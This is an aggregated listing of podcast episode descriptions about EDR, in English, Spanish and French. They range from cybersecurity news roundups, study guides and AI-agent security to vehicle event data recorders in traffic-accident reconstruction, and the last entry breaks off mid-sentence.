Podcasts about EDR

CISA warns that pro-Russia hacktivist groups are targeting US critical infrastructure. Google patches three new Chrome zero-day vulnerabilities. North Korean actors exploit React2Shell to deploy a new backdoor.  Researchers claim Docker Hub secret leakage is now a systemic problem. Attackers exploit an unpatched zero-day in Gogs, the self-hosted Git service. IBM patches more than 100 vulnerabilities across its product line. Storm-0249 abuses endpoint detection and response tools. The DOJ indicts a former Accenture employee for allegedly misleading federal customers about cloud security. Our guest is Kavitha Mariappan, Chief Transformation Officer at Rubrik, talking about understanding & building resilience against identity-driven threats. A malware tutor gets schooled by the law. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest On today's Industry Voices segment, we are joined by Kavitha Mariappan, Chief Transformation Officer at Knowledge Partner Rubrik, talking about understanding and building resilience against identity-driven threats. Tune into Kavitha's full conversation here.  New Rubrik Research Finds Identity Resilience is Imperative as AI Wave Floods the Workplace with AI Agents (Press release) The Identity Crisis: Understanding and Building Resilience Against Identity-Driven Threats (Report)  Agentic AI and Identity Sprawl (Data Security Decoded podcast episode) Host Caleb Tolin and guest ⁠Joe Hladik⁠, Head of Rubrik Zero Labs, to unpack the findings from their the report Kavitha addresses.  Resources: Rubrik's Data Security Decoded podcast airs semi-monthly on the N2K CyberWire network with host Caleb Tolin. You can catch new episodes twice a month on Tuesdays on your favorite podcast app. Selected Reading CISA: Pro-Russia Hacktivists Target US Critical Infrastructure New cybersecurity guidance paves the way for AI in critical infrastructure | CyberScoop Google Releases Critical Chrome Security Update to Address Zero-Days - Infosecurity Magazine North Korea-linked ‘EtherRAT' backdoor used in React2Shell attacks | SC Media Thousands of Exposed Secrets Found on Docker Hub - Flare Hackers exploit unpatched Gogs zero-day to breach 700 servers IBM Patches Over 100 Vulnerabilities - SecurityWeek Ransomware IAB abuses EDR for stealthy malware execution US charges former Accenture employee with misleading feds on cloud platform's security - Nextgov/FCW Man gets jail for filming malware tutorials for syndicate; 129 Singapore victims lost S$3.2m - CNA Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? N2K CyberWire helps you reach the industry's most influential leaders and operators, while building visibility, authority, and connectivity across the cybersecurity community. Learn more at sponsor.thecyberwire.com. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

This week in our technical segment, you will learn how to build a MITM proxy device using Kali Linux, some custom scripts, and a Raspberry PI! In the security news: Hacking Smart BBQ Probes China uses us as a proxy LOLPROX and living off the Hypervisor Are we overreating to React4Shell? Prolific Spyware vendors EDR evaluations and tin foil hats Compiling to Bash! How e-waste became a conference badge Overflows via underflows and reporting to CERT Users are using AI to complete mandatory infosec training! AI in your IDE is not a good idea Cybercrime is on the rise, and its the kids AI can replace humans in power plants Will AI prompt injection ever go away? To use a VPN or to not use a VPN, that is the question Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-904

professorjrod@gmail.comIn this episode of Technology Tap: CompTIA Study Guide, we delve into endpoint security—a crucial topic for anyone preparing for IT certification exams, especially CompTIA. Traditional firewalls no longer fully protect your network; attackers now exploit endpoints like laptops, phones, printers, and smart devices to breach security. We explore how threats bypass perimeter defenses by targeting users and devices directly, and explain essential controls such as hardening, segmentation, encryption, patching, behavior analytics, and access management. Whether you're studying for your CompTIA exam or seeking practical IT skills development, this episode offers critical insights and IT certification tips to strengthen your understanding of cybersecurity fundamentals. Tune in to enhance your tech exam prep and advance your technology education journey.We start with foundations that actually move risk: baseline configurations, aggressive patch management, and closing unnecessary ports and services. From there we layer modern defenses—EDR and XDR for continuous telemetry and automated containment, UEBA to surface the 3 a.m. login or odd data pulls, and the underrated duo of least privilege and application allow listing to deny unknown code a chance to run. You'll hear why full disk encryption is non‑negotiable and how policy, not heroics, sustains security over time.Mobile endpoints take center stage with clear tactics for safer travel and remote work: stronger screen locks and biometrics, MDM policies that enforce remote wipe and jailbreak detection, and connection hygiene that favors VPN and cellular over public Wi‑Fi. We break down evil twin traps, side loading risks, and permission sprawl, then pivot to IoT realities—default passwords, stale firmware, exposed admin panels—and how VLAN isolation and firmware schedules defang them. A real case of a chatty lobby printer becoming an attack pivot drives home the need for logging and outbound controls through SIEM.The takeaway is simple and urgent: if it connects, it can be attacked, and if it's hardened, segmented, encrypted, and monitored, it can be defended. Subscribe for more practical security deep dives, share this with a teammate who owns devices or networks, and leave a review to tell us which control you'll deploy first.Support the showArt By Sarah/DesmondMusic by Joakim KarudLittle chacha ProductionsJuan Rodriguez can be reached atTikTok @ProfessorJrodProfessorJRod@gmail.com@Prof_JRodInstagram ProfessorJRod

Send us a textAt IT Nation Connect 2025, Mike DePalma—VP of SMB Cybersecurity at OpenText—sits down with Joey Pinz to talk about rebuilding community in the MSP world, evolving vendor programs, and the tidal wave of AI reshaping security and operations.Mike shares how OpenText's new EDR rollout is simplifying life for ConnectWise partners, the surprising results of their latest MSP Report, and why most AI projects fail—hint: it's not the tech. He opens up about the Datto → Kaseya acquisition, lessons in leadership, and why discipline, presence, and family still define success more than revenue or market share.

Danny Jenkins — Founder of ThreatLocker and the Zero-Trust RevolutionDanny Jenkins is the CEO of ThreatLocker, the leading cybersecurity company that he built alongside his wife. Hosts Jack Clabby of Carlton Fields, P.A., and Kayley Melton of the Cognitive Security Institute follow Danny's journey from a scrappy IT consultant to leading one of the fastest-growing cybersecurity companies in the world.Danny shares the moment everything changed: watching a small business nearly collapse after a catastrophic ransomware attack. That experience reshaped his mission and ultimately sparked the creation of ThreatLocker. He also reflects on the gritty early days—cold-calling from his living room, coding through the night, and taking on debt before finally landing their first $5,000 customer.Danny explains the origins of Zero Trust World, his passion for educating IT teams, and why adopting a hacker mindset is essential for modern defenders.In the Lifestyle Polygraph, Danny relates his early “revenge tech” against school bullies, the place he escapes to when celebrating big wins, and the movie franchise he insists is absolutely a Christmas classic.Follow Danny on LinkedIn: https://www.linkedin.com/in/dannyjenkins/ 00:00 Introduction to Cybersecurity and ThreatLocker02:26 The Birth of ThreatLocker: A Personal Journey05:42 The Evolution of Zero Trust Security08:35 Real-World Impact of Cyber Attacks11:25 The Importance of a Hacker Mindset14:46 The Role of SOC Teams in Cybersecurity17:34 Building a Culture of Security20:23 Hiring for Passion and Skill in Cybersecurity23:44 Understanding Zero Trust: Trust No One26:32 Lifestyle Polygraph: Personal Insights and Fun29:41 Conclusion and Future of ThreatLocker

AI agents aren't just reacting anymore, they're thinking, learning, and sometimes deleting your entire production database without asking. The real question isn't if your AI agent will be hacked, it's when, and whether you'll have the right hooks in place to stop it before it happens. In this episode, Ron breaks down the ChatGPT Atlas vulnerability that shocked researchers, revealing how malicious prompts can turn AI assistants against their own users by bypassing safeguards and accessing file systems. He presents his new talk "Hooking Before Hacking," introducing a framework for applying EDR principles, prevention, detection, and response, to AI agents before they execute unauthorized commands. From pre-tool use hooks that catch malicious intent to one-time passwords that put humans back in the loop, this episode shares practical security controls you can implement today to prevent your AI agents from going rogue.   Impactful Moments: 00:00 - Introduction 02:00 - ChatGPT Atlas vulnerability exposed 04:00 - AI technology outpacing security guardrails 05:00 - Guardrail jailbreaks and prompt injection 06:00 - AI agents deleting production databases 07:00 - EDR principles for AI agents 09:00 - Pre-tool use hooks catch intention 11:00 - User prompt sanitization prevents leaks 14:00 - One-time passwords for agent workflows 16:00 - Automation mistakes across 10 years   Links: Connect with Ron on LinkedIn: https://www.linkedin.com/in/ronaldeddings/ Check out the entire article here: https://www.yahoo.com/news/articles/cybersecurity-experts-warn-openai-chatgpt-101658986.html  GitHub Repository: https://hackervalley.com/hooking-before-hacking  See Ron's "Hooking Before Hacking" presentation slides here: http://hackervalley.com/hooking-before-hacking-presentation Check out our website: https://hackervalley.com/ Upcoming events: https://www.hackervalley.com/livestreams Love Hacker Valley Studio? Pick up some swag: https://store.hackervalley.com Continue the conversation by joining our Discord: https://hackervalley.com/discord Become a sponsor of the show to amplify your brand: https://hackervalley.com/work-with-us/ Join our creative mastermind and stand out as a cybersecurity professional: https://www.patreon.com/hackervalleystudio    

This episode breaks down Endpoint Detection and Response EDR and why it has become a core element of modern cybersecurity. You'll learn how EDR monitors devices in real time, detects sophisticated threats, supports deep investigations, and enables instant response to minimize damage. A perfect starting point for anyone looking to understand how organizations strengthen endpoint security against today's evolving attacks.

In this Security Squawk episode, Brian Horning from Xact IT is joined by guests to unpack three real ransomware incidents, the rapid rise of “The Gentlemen” gang, and how attackers bypass basic security by turning off tools like Windows Defender. You'll learn why relying only on built-in protections creates dangerous blind spots, what layered security with EDR, SOC monitoring, and log retention looks like, and the practical steps business leaders can take now to harden their defenses and reduce ransomware risk.

The world's biggest open-source ecosystem - npm - faced its first self-spreading worm.They called it Shai Hulud.It didn't just infect one package. It infected developers themselves.When a maintainer got phished, the worm harvested credentials, hijacked tokens, and created new CI/CD workflows to keep spreading - automatically.No command-and-control. No manual uploads. Just a chain reaction across the npm registry.And while the world was busy shouting about “2.6 billion downloads affected,” this real threat was quietly exfiltrating GitHub, cloud, and npm secrets - right under everyone's nose.This isn't just another npm story.It's the first-ever self-replicating supply chain worm - and a wake-up call for every developer and security team building in the open.Watch host Rob Maas (Field CTO, ON2IT) and Yuri Wit (SOC Analyst, ON2IT) break down how it started, how it spread, and how to make sure your pipeline isn't the next one to go viral.(00:00) - Intro, welcome & what npm is (00:01) - Crypto drainer: how it worked, maintainer phish & real impact (00:05) - “Shai Hulud” worm: credential harvesting & package spread (00:07) - Hype vs reality: the “2.6 billion downloads” myth & media reaction (00:10) - Defenses: dependency strategy & CI/CD workflow alerts (00:14) - Secrets hygiene, OS targeting (Windows exit), end-user/EDR tips & takeaways Key Topics CoveredHow a maintainer phish and TOTP capture led to a crypto drainer in npm.Why Shai Hulud's credential harvesting + CI/CD persistence makes it high-impact.Practical defenses: pin/review dependencies, CI/CD change alerts, secret rotation, egress monitoring.What developers vs. end users can (and can't) do in supply-chain attacks.Got your attention? Subscribe to Threat Talks and turn on notifications for more content on the world's leading cyber threats and trends.Guest and Host Links: Rob Maas (Field CTO, ON2IT): https://www.linkedin.com/in/robmaas83/  Yuri Wit (SOC Analyst, ON2IT): https://www.linkedin.com/in/yuriwit/   Additional Resources Threat Talks: https://threat-talks.com/ ON2IT (Zero Trust as a Service): https://on2it.net/ AMS-IX: https://www.ams-ix.net/ams npm: https://www.npmjs.com/ Node.js: https://nodejs.org/ GitHub Docs: Actions & Workflows: https://docs.github.com/actions MetaMask: https://metamask.io/ OWASP Dependency Management: https://owasp.org/www-project-dependency-check/ SLSA Supply-chain Levels for Software Artifacts: https://slsa.dev/Click here to view the episode transcript.

Send us a textCheck us out at:  https://www.cisspcybertraining.com/Get access to 360 FREE CISSP Questions:  https://www.cisspcybertraining.com/offers/dzHKVcDB/checkoutGet access to my FREE CISSP Self-Study Essentials Videos:  https://www.cisspcybertraining.com/offers/KzBKKouvSecurity programs fail when they try to do everything at once. We walk through a clear three-phase plan that keeps you focused and effective: start with a real gap assessment anchored in leadership's risk tolerance, convert findings into decisions to mitigate, accept, or transfer risk, and then implement with a balanced mix of people, process, and tools. Along the way, we share what to look for when hiring a virtual CISO and how to turn that engagement into actionable momentum instead of another shelfware report.From there, we tighten the perimeter by defining bounds that keep systems within safe lanes: role-based access control, data classification, DLP, segmentation, encryption, and change management that shrinks blast radius. We get tactical with process isolation, sandboxing, capability-based security, and application whitelisting, plus a grounded comparison of MAC vs DAC and when a hybrid model makes sense. Defense in depth ties it together with physical safeguards, network protections, EDR and patching, application security practices, and data security. We keep the human layer practical with targeted awareness training and a tested incident response plan.Resilience is the throughline. We advocate for secure defaults and least privilege by design, logging that's actually reviewed, and updates that apply on a measured cadence. When things break, fail safely: graceful degradation, clean error handling, separation of concerns, redundancy, and real-world drills that expose weak spots early. Governance keeps the program honest with separation of duties, dual control, job rotation, and change boards that prevent unilateral risk. Finally, we demystify zero trust: start small, micro-segment your crown jewels, verify continuously, and respect cloud nuances without overcomplicating your stack.If this helps you clarify your next move, follow the show, share it with a teammate, and leave a quick review so others can find it. Tell us: which phase are you tackling first?Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

Hablamos con Marcos Pérez, ingeniero e investigador de accidentes de tráfico dentro del Congreso Internacional de Investigación de Accidentes de Tráfico CESVIMAP 2025 1. Quién es Marcos Pérez y a qué se dedica • Ingeniero mecánico, reconstructor e investigador de accidentes de tráfico. • También es ponente en el Congreso de Investigación de Accidentes de Tráfico. • Trayectoria: • Empieza en el Departamento de Ingeniería Mecánica de la Universidad de Vigo. • Allí se integra en un grupo de investigación de accidentes de tráfico. • Lleva trabajando en esto desde 2001. • En 2007, al terminar su proyecto fin de carrera y finalizar el proyecto universitario, crea una empresa independiente junto con su antiguo jefe (ahora socio), centrada en: • Investigación y reconstrucción de accidentes. • Temas técnicos ligados al automóvil. 2. La “caja negra” que todos llevamos: el teléfono móvil • Idea central de su ponencia: • Además de las “cajas negras” de aviones o EDR en vehículos, todos llevamos una especie de caja negra en el bolsillo: el móvil. • Las compañías de telefonía y servicios (ej. Google) registran movimientos y ubicaciones de las personas. • La DGT ya hizo un piloto hace años usando datos de posicionamiento de móviles para estudiar movimientos de la población. • Marcos explica cómo extraer esos datos de los teléfonos y utilizarlos en: • Investigación de accidentes de tráfico. • Determinación de la posición y trayectoria de una persona. 3. Aplicación práctica: atropellos de peatones • Más allá de coches y motos, el móvil es muy útil en atropellos de peatones. • Si el peatón lleva el móvil encima (bolsillo, mochila, etc.), se pueden obtener: • Trayectoria previa (por dónde venía caminando). • Velocidad del peatón en un instante concreto, via GPS. • Si ese instante coincide o está muy próximo al momento del accidente: • Se obtiene un dato de velocidad muy fiable. • Ese dato ayuda a reconstruir qué estaba haciendo el peatón y puede aportar indicios relevantes sobre la responsabilidad en el atropello. • Importante: no sustituye a las demás pruebas, es una fuente de datos adicional. 4. Evolución de la calidad de los datos de ubicación • Antes, si se llevaba el GPS del móvil activado, se registraba un dato de localización cada segundo o casi. • Cambios recientes por normativa europea de privacidad: • Se limita la recogida y almacenamiento de datos en servidores (ej. Google). • Ahora la información se almacena mucho más en el propio móvil y menos en la nube. • El móvil tiene capacidad limitada, así que guarda menos puntos de datos. • Ejemplo personal de Marcos: • Historial de ubicaciones activado desde 2013. • Antes: el archivo ocupaba unos 2 GB. • Ahora: ocupa solo 78 MB. • Conclusión: la densidad y continuidad del dato se ha reducido mucho, lo que limita la precisión temporal para reconstrucción. 5. Especialización en automóvil: más allá de la reconstrucción “clásica” La empresa de Marcos se ha ido especializando de forma muy vertical en el automóvil: 1. Reconstrucción de accidentes de tráfico 2. Accidentes singulares / reclamaciones singulares: • Airbags que no se activan o que funcionan de forma presuntamente incorrecta. • Posibles defectos de funcionamiento de vehículos. 3. Análisis de averías en garantía: • Evaluación técnica de averías en vehículos aún en periodo de garantía. 4. Investigación de incendios en vehículos: • Investigan la causa técnica del incendio, no valoran económicamente (no hacen la peritación de daños). • Analizan incendios en vehículos y, en algunos casos, incendios en estructuras solo cuando hay un vehículo implicado. 6. Casos complejos y colaboración con Guardia Civil (UCO) • Su alta especialización en automóvil les lleva a colaborar en casos de relevancia penal y mediática: • Colaboración con la UCO de la Guardia Civil en el caso DIANA QUER: • Su empresa ayudó a identificar un vehículo a partir de imágenes. • Otros casos citados: • Caso Manuel Achavero (Badajoz). • Un caso en Valladolid que todavía no está juzgado. • También se encuentran con: • Guardarraíles (biondas) que funcionan y otros que no, • Colisiones con otros medios de transporte. • Hay temas que aún no puede detallar porque están pendientes de resolución judicial, con compromiso de explicarlos en profundidad una vez estén juzgados. Vídeo completo: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Charlamos con José Antonio Maurenza (CESVIMAP) sobre el crash test entre coche eléctrico y coche de combustión en el Congreso Internacional de Investigación de Accidentes de Tráfico CESVIMAP 2025: 1. Contexto del ensayo y del congreso • CESVIMAP organiza un crash test “a cielo abierto” como eje del congreso: • Vehículo 1: Volkswagen ID.3, 100 % eléctrico, 1.800 kg. • Vehículo 2: Renault Mégane, combustión, 1.400 kg, más antiguo. • Estrategia de storytelling: • El impacto se realiza el primer día, • Las conclusiones técnicas se presentan al final del congreso, cruzándolas con lo expuesto por otros ponentes. 2. Objetivo técnico del crash test • Analizar y comparar: • Cómo se extraen los datos en un vehículo moderno (ID.3, con EDR / registrador de datos). • Qué hay que hacer para obtener datos en un vehículo antiguo, sin esa electrónica. • Mensaje clave: • En el coche moderno: lectura de datos rápida y sencilla. • En el coche antiguo: día entero de sensorización (acelerómetros en distintos puntos) para registrar aceleraciones y deformaciones. 3. Desarrollo del impacto y dificultades prácticas • Ensayo: alcance trasero a velocidad prevista de 35 km/h. • Datos reales: • Caja de datos del vehículo eléctrico registra 38 km/h de velocidad de impacto. • Se detecta un giro de volante de unos 8 grados, que desvía ligeramente la trayectoria. • Dificultad añadida: • No se usa guía fija interior, se hace en exterior con coche teledirigido, sin carril físico. • Han necesitado cuatro días ajustando la velocidad, para que en los 2–3 segundos que dura el recorrido se cumplan las condiciones teóricas. • Valor didáctico: • Incluso en un entorno muy controlado hay variables no ideales; explicar estas desviaciones da más valor al trabajo técnico de reconstrucción. 4. Resultados principales: velocidades, ΔV y deceleraciones • Vehículo eléctrico (ID.3): • Velocidad impacto: ~38 km/h. • ΔV ≈ 21 km/h. • Deceleración ≈ 12 g medida por el propio vehículo. • Activaciones: • Airbag conductor (el de pasajero estaba desconectado). • Airbags de cortina. • Pretensores de cinturones. • Vehículo alcanzado (Renault Mégane): • Peso: 1.400 kg. • Al ir en punto muerto y sin freno, tras el impacto el Mégane sale lanzado a ~25 km/h. • Daños severos en la parte trasera (“no desintegrada, pero muy dañada”). • El dummy niño del asiento trasero acaba con las rodillas prácticamente pegadas al respaldo delantero, lo que ilustra la importancia de la gestión de energía en ocupantes traseros. 5. Comparativa con crash tests habituales a 15 km/h • CESVIMAP realiza habitualmente crash tests a 15 km/h contra un muro rígido de 35 toneladas: • Toda la velocidad se transforma en energía de deformación del vehículo, con ΔV alto y deceleración elevada. • En el alcance entre coches: • La deformación es más progresiva, al no chocar contra un elemento completamente indeformable. • El ΔV del impacto a ~35–38 km/h (21 km/h) no es tan distinto del ΔV del ensayo a 15 km/h contra muro (~16 km/h). • La diferencia clave está en el tiempo de aplicación de ese ΔV: • ΔV similar en tiempos distintos → deceleraciones distintas (a menor tiempo, mayor g). 6. Sensorización del Mégane y lección sobre dónde medir • Se sensorizó el Mégane con acelerómetros: • En estructura trasera / maletero: deceleraciones ≈ 12 g. • En varilla del reposacabezas, no en la cabeza del dummy: picos ≈ 21 g. • Reconocimiento de límites: • CESVIMAP no dispone de sensores homologados para cabeza de dummy, por eso no colocaron el acelerómetro ahí. • Se abre la puerta a que en el futuro un laboratorio aporte dummies instrumentados y se hagan ensayos conjuntos. 7. Mensajes fuerza de la ponencia • La facilidad de extraer datos en vehículos modernos no exime de la necesidad de un reconstructor cualificado: • Hay que interpretar los datos, ponerlos en contexto, evitar conclusiones simplistas. • La complejidad real de un accidente se aprecia cuando, incluso con todo previsto, surgen desviaciones (giro de 8º, velocidad ligeramente distinta). • Se demuestra el know-how de CESVIMAP: • Control de ΔV, deceleraciones y daño estructural. • Capacidad para plantear ensayos complejos fuera de la “zona cómoda” del laboratorio. • Se abre un campo de colaboración futura: • ENSAYOS COMPARTIDOS con laboratorios de biomecánica y dummies altamente sensorizados, que permitan relacionar: • Deceleraciones en estructura. • Deceleraciones reales en cabeza y tórax de los ocupantes. Vídeo completo: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Javier Roch, miembro de los Mossos d'Esquadra en el Departamento de Investigación de Accidentes de Tráfico, lleva más de 20 años dedicado a reconstruir siniestros. Explica que, cuando empezó, un coche era “una caja metálica con ruedas” y la investigación se hacía con cintas métricas y croquis. Hoy, en cambio, disponen de láser escáner y fotogrametría con dron para levantar escenas en 3D, y los vehículos se han convertido en verdaderos ordenadores sobre ruedas que registran gran cantidad de datos útiles para saber qué ha pasado en un accidente. Esa evolución tecnológica, además, ha traído consigo coches estructuralmente mucho más seguros: a igual velocidad, un impacto que hace veinte años provocaba lesiones muy graves hoy puede tener consecuencias mucho menores. Una de las piezas clave de esa nueva etapa es el EDR (Event Data Recorder), la “caja negra” del coche. Roch subraya que estos dispositivos están pensados para almacenar únicamente datos técnicos durante unos segundos antes del impacto: velocidad, uso del freno, uso del acelerador, revoluciones del motor, etc. Defiende que no se invade la privacidad del conductor, porque la velocidad a la que circula por una vía pública no es un dato íntimo —igual que se puede medir con un radar, se puede leer del EDR en un siniestro grave—, y esa información es esencial para aclarar qué ha ocurrido y tomar decisiones judiciales más justas. Pese a todo el avance tecnológico, sigue habiendo un problema muy básico: el uso del cinturón de seguridad. Roch constata que aún hay demasiados ocupantes, especialmente en los asientos traseros, que no lo utilizan porque “van cerca” o “van despacio” y creen que no les va a pasar nada. Su mensaje es contundente: el cinturón salva vidas sí o sí en vuelcos e impactos relativamente “normales”, a 50, 60 o 70 km/h, precisamente esas velocidades en las que muchos se lo quitan pensando que no es necesario. Incluso a velocidades muy altas siempre ayuda algo, pero donde realmente marca la diferencia —y donde decide si sales ileso o no— es en esos trayectos cotidianos donde la gente se confía. Vídeo completo: https://youtu.be/ZpMOeuSaDAE?si=vBMdNQ8jbWb2S5_e

Isabel López Riera es fiscal de Seguridad Vial en Cataluña desde 2013, cuando fue nombrada especialista en esta materia en la Fiscalía Provincial de Barcelona. Explica que, dentro de la Fiscalía, el trabajo se organiza por especialidades: cada fiscal se dedica de forma preferente a un ámbito concreto (seguridad vial, violencia de género, menores, etc.), lo que permite profundizar mucho más en cada materia y elevar la calidad del trabajo. En su caso, se ocupa sobre todo de los siniestros más graves: aquellos en los que hay personas fallecidas o víctimas con lesiones de especial gravedad, tanto en la capital (Barcelona ciudad) como en las secciones territoriales de la Fiscalía y en el resto de la provincia. Su día a día arranca en cuanto se produce un siniestro grave: toma conocimiento del asunto desde el primer momento y se dirige al juzgado para que ese procedimiento lo lleve la fiscal especializada en seguridad vial. A partir de ahí, impulsa la instrucción para que el caso no se eternice en fase de investigación: pide diligencias, supervisa que se practiquen las pruebas necesarias, y trata de que el asunto se resuelva lo antes posible, bien archivando si no hay delito, bien llevando el caso a juicio si procede. Cuando hay juicio oral, la fiscalía interviene en sala defendiendo la calificación de los hechos y, si se dicta condena, también participa en la fase de ejecución de la sentencia, vigilando que se cumpla lo acordado y, muy especialmente, que se respeten los derechos de las víctimas y se exija la responsabilidad penal a quien corresponda. Sobre la sensación social de que “solo se busca un culpable” y no tanto las causas técnicas del accidente, Isabel lo desmonta de raíz: para ella ambas cosas van absolutamente unidas. Para decidir si alguien es responsable, primero hay que saber con el máximo rigor qué ha ocurrido. Y ahí el papel de las fuerzas y cuerpos de seguridad —la policía judicial de tráfico— es esencial. Son ellos quienes reconstruyen el siniestro, describen al juzgado qué ha pasado y con qué dinámicas, y esa base técnica es la que permite después valorar si hubo una conducta penalmente reprochable o no. A veces, de esa investigación sale una responsabilidad penal clara; otras, se concluye que la persona implicada no ha cometido un delito, aunque haya habido un accidente. Pero sin un buen análisis técnico previo, no hay forma seria de trazar esa línea. En ese contexto, la tecnología —y en particular el EDR, el sistema de registro de datos del vehículo— es, según explica, una herramienta más al servicio de esa reconstrucción. Subraya que el EDR no es una “caja negra” al estilo de los aviones, sino un registro muy concreto de parámetros técnicos del coche: durante unos cinco segundos antes del impacto y hasta la colisión, el sistema almacena datos como la velocidad, si se ha pisado el freno, el estado de determinados sistemas, etc. Esos datos no sustituyen al resto de pruebas, sino que se suman a ellas: hay que ponerlos en relación con declaraciones de testigos, informes de la policía, mediciones en el lugar, cámaras de tráfico, estudios de velocidad tradicionales y cualquier otra diligencia de investigación que se haya practicado. Bien utilizados, ayudan a afinar la reconstrucción y a acercarse más a la verdad de lo ocurrido. Respecto al miedo de algunos conductores a que el EDR vulnere su intimidad, Isabel es clara: desde la Fiscalía consideran que no se está afectando a derechos fundamentales. Los datos que recoge el EDR son datos técnicos y objetivos del vehículo, no información personal sobre la vida privada del conductor. Saber a qué velocidad iba el coche o si se pisó el freno justo antes del choque no tiene nada que ver, recuerda, con registrar conversaciones, ubicaciones prolongadas o aspectos íntimos de la persona. Son parámetros físicos del vehículo en un momento muy concreto, ligados a un hecho con trascendencia penal, y por eso entienden que no invaden el derecho a la intimidad. Por último, la fiscal también se detiene en el impacto de la nueva movilidad, especialmente de los Vehículos de Movilidad Personal (como los patinetes eléctricos), en la accidentalidad de Cataluña, y muy particularmente en Barcelona. Señala que la llegada de nuevos vehículos y nuevas formas de desplazarse por la ciudad incrementa el riesgo si no van acompañados de normas claras y de una cultura de seguridad. El resultado es una incidencia creciente en siniestros y conflictos de tráfico. Las últimas reformas legales —como la introducción de seguros obligatorios y otras medidas sobre VMP— van precisamente en la línea de ordenar este escenario y garantizar que, cuando se produce un siniestro, las víctimas queden protegidas y haya mecanismos claros para exigir responsabilidades y resarcir los daños. Para ella, en el fondo, todo se resume en lo mismo: combinar técnica, derecho y tecnología para conocer bien qué ha pasado y proteger, al máximo posible, a quienes resultan perjudicados en la carretera.

In this episode of 'Cybersecurity Today,' host Jim Love covers multiple pressing topics: CloudFlare's major outage affecting services like OpenAI and Discord, Microsoft's new AI feature in Windows 11 and its potential malware risks, a new red team tool that exploits cloud-based EDR systems, and a new tactic using calendar invites as a stealth attack vector. Additionally, a critical SAP vulnerability scoring a perfect 10 on the CVSS scale is discussed alongside a peculiar event where Anthropic's AI mistakenly tried to report a cybercrime to the FBI. The episode wraps up with a mention of the book 'Alyssa, A Tale of Quantum Kisses' and a thank you to Meter for sponsoring the podcast. Tune in for essential cybersecurity insights. 00:00 Introduction and Sponsor Message 00:22 CloudFlare Outage Causes Major Disruptions 02:55 Microsoft's New AI Features and Malware Risks 05:22 Silent but Deadly: New Red Team Tool 07:39 Calendar Invites as a Stealth Attack Vector 10:04 Critical SAP Vulnerability 12:11 Anthropic's AI and the FBI Incident 14:06 Conclusion and Final Thoughts

AI is accelerating ransomware attacks and reshaping the cyber threat landscape. Join Brendan Hall, Alliant Cyber, and Brad LaPorte, Morphisec, as they discuss how evolving ransomware tactics and polymorphic malware are challenging traditional cybersecurity defenses. Together they share how a preemptive approach to ransomware protection can help organizations reduce exposure, lower insurance costs and strengthen cyber resilience as AI continues to accelerate the speed and sophistication of attacks. They also highlight how Morphisec's patented technology and ransomware-free guarantee provide a powerful layer of protection that complements existing MDR and EDR tools.

Parce que… c'est l'épisode 0x665! Shameless plug 17 au 20 novembre 2025 - European Cyber Week 25 et 26 février 2026 - SéQCure 2026 CfP 14 au 17 avril 2026 - Botconf 2026 28 et 29 avril 2026 - Cybereco Cyberconférence 2026 9 au 17 mai 2026 - NorthSec 2026 3 au 5 juin 2025 - SSTIC 2026 Description Dans cet épisode, l'équipe composée de Nicolas, Dominique et Cindy explore les mesures d'hygiène de base en cybersécurité que les petites et moyennes entreprises devraient mettre en place. L'objectif est d'identifier les solutions peu coûteuses qui offrent un gain important en sécurité et qui aident les organisations à répondre aux exigences de certifications et de conformité. L'authentification et la gestion des mots de passe Le premier pilier essentiel abordé concerne l'authentification et la gestion des mots de passe. Contrairement à ce que certains pourraient penser, les mots de passe demeurent un enjeu critique et représentent la faiblesse numéro un dans la majorité des tests d'intrusion. Cette problématique touche autant les mots de passe utilisés pour se connecter aux services externes que ceux utilisés à l'interne, incluant les comptes de service. L'équipe recommande fortement l'adoption de l'authentification unique (SSO) dès que possible, malgré l'existence d'une liste de la honte recensant les entreprises qui forcent leurs clients à prendre des forfaits coûteux pour accéder au SSO. Le principe est simple : moins il y a de mots de passe, mieux c'est. L'utilisation d'un gestionnaire de mots de passe s'avère non négociable. Il ne suffit pas de demander aux employés d'utiliser des mots de passe différents et complexes pour chaque site sans leur fournir les outils appropriés. Les experts mettent en garde contre l'utilisation des gestionnaires intégrés aux navigateurs web comme Chrome ou Edge, qui ne sont pas de qualité égale aux véritables gestionnaires de mots de passe autonomes disponibles sur le marché. Un point crucial soulevé est que si quelqu'un compromet une machine en tant qu'administrateur, il peut accéder à tous les mots de passe stockés dans le navigateur, alors qu'un gestionnaire de mots de passe dédié nécessite le mot de passe maître pour y accéder, offrant ainsi une protection supplémentaire même en cas de compromission de la machine. La protection des postes de travail Le deuxième élément fondamental concerne ce qu'on appelait autrefois les antivirus, maintenant connus sous le nom d'EDR (Endpoint Detection and Response). Cette protection minimale devrait être mise en place sur tous les environnements, même sur les ordinateurs Mac. Bien que les EDR ne soient pas infaillibles et puissent être contournés, ils représentent un premier niveau de protection accessible financièrement. L'équipe souligne l'importance de choisir un EDR adapté aux besoins spécifiques de l'entreprise en considérant plusieurs facteurs : le prix, la quantité de postes à protéger, le support offert, l'interface utilisateur, et la présence ou non de ressources techniques internes capables de gérer la solution. Certains EDR sont plus faciles à administrer tandis que d'autres offrent plus d'options mais nécessitent des formations et du personnel qualifié. Ces solutions deviennent de plus en plus accessibles pour les PME et constituent une brique essentielle de la sécurité. Les mises à jour automatiques Le troisième pilier aborde la question du patching, ces fameuses mises à jour souvent perçues comme un mal nécessaire. Pour les PME, la recommandation est claire : activer le patching automatique plutôt que de compter sur une vérification manuelle quotidienne. Cette approche s'applique non seulement aux systèmes internes mais aussi aux applications web comme WordPress. Un point important soulevé est que l'activation du patching automatique implique probablement d'avoir une bonne gestion des sauvegardes. Par exemple, si WordPress se met à jour 